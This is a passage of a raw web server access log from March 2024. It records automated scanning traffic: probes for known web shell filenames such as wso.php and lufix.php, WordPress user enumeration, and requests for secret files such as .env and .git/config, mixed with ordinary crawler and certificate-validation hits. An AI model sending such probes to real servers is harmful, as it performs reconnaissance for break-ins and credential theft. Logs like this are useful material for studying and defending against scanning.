Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:50:44 +0700] "GET /inputs.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:50:50 +0700] "GET /autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Mar/2024:14:50:54 +0700] "GET /text.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 148.72.211.177 - - [11/Mar/2024:00:14:11 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 148.72.211.177 - - [11/Mar/2024:00:14:22 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 148.72.211.177 - - [11/Mar/2024:00:14:25 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [14/Mar/2024:01:12:47 +0700] "GET /repeater.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:12:52 +0700] "GET /admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:12:56 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:12:59 +0700] "GET /cloud.php/wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:13:03 +0700] "GET /cong.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:13:09 +0700] "GET /network.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:13:17 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:13:23 +0700] "GET /wp-2019.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:13:29 +0700] "GET /atomlib.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:13:39 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:13:44 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:13:55 +0700] "GET /log.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:14:07 +0700] "GET /index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:14:15 +0700] "GET /mail.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:14:24 +0700] "GET /lufix.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:14:32 +0700] "GET /doc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:14:43 +0700] "GET /bak.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:14:56 +0700] "GET /content.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:15:04 +0700] "GET /upfile.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:15:13 +0700] "GET /wp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:15:28 +0700] "GET /wp-conflg.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:15:37 +0700] "GET /bypass.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:15:45 +0700] "GET /wp-activate.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:16:06 +0700] "GET /404.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:16:18 +0700] "GET /updates.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:16:22 +0700] "GET /radio.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:16:31 +0700] "GET /plugins.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:16:34 +0700] "GET /xmrlpc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:16:46 +0700] "GET /ae.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:16:57 +0700] "GET /moon.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:17:06 +0700] "GET /blog.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Mar/2024:01:17:15 +0700] "GET /themes.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 35.214.174.111 - - [14/Mar/2024:01:43:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; rb.gy/oupwis; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.174.111 - - [14/Mar/2024:01:44:06 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; rb.gy/oupwis; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.174.111 - - [14/Mar/2024:01:44:47 +0700] "GET /app-ads.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; rb.gy/oupwis; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.174.111 - - [14/Mar/2024:01:44:47 +0700] "GET /ads.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; rb.gy/oupwis; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.174.111 - - [14/Mar/2024:01:44:50 +0700] "GET /checkout/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; rb.gy/oupwis; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.174.111 - - [14/Mar/2024:01:44:50 +0700] "GET /shop/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; rb.gy/oupwis; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.214.174.111 - - [14/Mar/2024:01:44:50 +0700] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; rb.gy/oupwis; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 207.154.193.86 - - [15/Mar/2024:21:45:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 51.68.228.235 - - [16/Mar/2024:00:21:05 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 51.68.228.235 - - [16/Mar/2024:00:21:10 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 51.68.228.235 - - [16/Mar/2024:00:21:14 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 35.85.230.252 - - [16/Mar/2024:09:15:35 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.0; +https://forms.gle/ajBaxygz9jSR8p8G9)" 35.85.230.252 - - [16/Mar/2024:09:15:40 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.0; +https://forms.gle/ajBaxygz9jSR8p8G9)" 183.136.225.45 - - [16/Mar/2024:13:15:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36" 183.136.225.45 - - [16/Mar/2024:13:15:17 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.45 - - [16/Mar/2024:13:15:46 +0700] "GET /favicon.ico HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 91.92.252.169 - - [16/Mar/2024:13:29:55 +0700] "GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 205.210.31.34 - - [17/Mar/2024:04:00:46 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 91.92.252.169 - - [18/Mar/2024:07:04:40 +0700] "GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 91.92.252.169 - - [20/Mar/2024:06:57:21 +0700] "GET /simple.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [20/Mar/2024:06:57:45 +0700] "GET /chosen.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [20/Mar/2024:06:58:09 +0700] "GET /inputs.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 69.163.186.210 - - [21/Mar/2024:01:32:17 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 69.163.186.210 - - [21/Mar/2024:01:32:21 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 69.163.186.210 - - [21/Mar/2024:01:32:25 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 198.235.24.183 - - [22/Mar/2024:09:06:30 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 35.167.94.89 - - [22/Mar/2024:10:17:46 +0700] "GET /.well-known/acme-challenge/psQllY7gSsJ4F4Cu57Kae8RySIaAKfaPOSf7a65fXQ0 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 16.170.243.191 - - [22/Mar/2024:10:17:46 +0700] "GET /.well-known/acme-challenge/psQllY7gSsJ4F4Cu57Kae8RySIaAKfaPOSf7a65fXQ0 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 23.178.112.209 - - [22/Mar/2024:10:17:46 +0700] "GET /.well-known/acme-challenge/psQllY7gSsJ4F4Cu57Kae8RySIaAKfaPOSf7a65fXQ0 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 13.59.101.27 - - [22/Mar/2024:10:17:46 +0700] "GET /.well-known/acme-challenge/psQllY7gSsJ4F4Cu57Kae8RySIaAKfaPOSf7a65fXQ0 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA084438) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1738.98 Mobile Safari/537.3" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /server HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /.vscode/sftp.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /about HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /debug/default/view?panel=config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /v2/_catalog HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /server-status HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /login.action HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /_all_dbs HTTP/1.1" 301 162 "-" "Mozilla/5.0 (l9scan/2.0.633323e223e2335313e2330313; +https://leakix.net)" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /.DS_Store HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /s/633323e223e2335313e2330313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /config.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /telescope/requests HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 128.199.182.55 - - [22/Mar/2024:10:18:02 +0700] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 65.154.226.168 - - [22/Mar/2024:10:18:08 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" 207.241.236.85 - - [22/Mar/2024:10:18:17 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/0569f25 warc/v0.8.33" 205.169.39.85 - - [22/Mar/2024:10:18:22 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 205.169.39.85 - - [22/Mar/2024:10:18:37 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 65.154.226.170 - - [22/Mar/2024:10:20:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" 142.202.48.16 - - [22/Mar/2024:20:03:04 +0700] "GET /wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)" 142.202.48.16 - - [22/Mar/2024:20:03:07 +0700] "GET /wordpress/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)" 142.202.48.16 - - [22/Mar/2024:20:03:08 +0700] "GET /old/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Apache/2.4.34 (Ubuntu) OpenSSL/1.1.1 (internal dummy connection)" 185.187.235.129 - - [23/Mar/2024:01:52:59 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 103.95.215.10 - - [23/Mar/2024:01:54:02 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.95.215.10 - - [23/Mar/2024:01:54:06 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.95.215.10 - - [23/Mar/2024:01:54:08 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 87.236.176.193 - - [23/Mar/2024:05:29:16 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 93.184.144.190 - - [23/Mar/2024:18:40:16 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 62.210.99.219 - - [23/Mar/2024:21:27:42 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 165.232.187.145 - - [24/Mar/2024:03:04:23 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 159.89.120.164 - - [24/Mar/2024:12:48:59 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 34.118.48.60 - - [24/Mar/2024:19:49:28 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36" 78.47.147.164 - - [24/Mar/2024:21:36:52 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 72.167.59.58 - - [25/Mar/2024:02:16:35 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 72.167.59.58 - - [25/Mar/2024:02:16:40 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 72.167.59.58 - - [25/Mar/2024:02:16:43 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 181.215.135.17 - - [25/Mar/2024:02:34:46 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 91.92.252.169 - - [25/Mar/2024:17:35:22 +0700] "GET /repeater.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:35:25 +0700] "GET /admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:35:29 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:35:32 +0700] "GET /cloud.php/wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:35:35 +0700] "GET /cong.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [25/Mar/2024:17:35:38 +0700] "GET /network.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 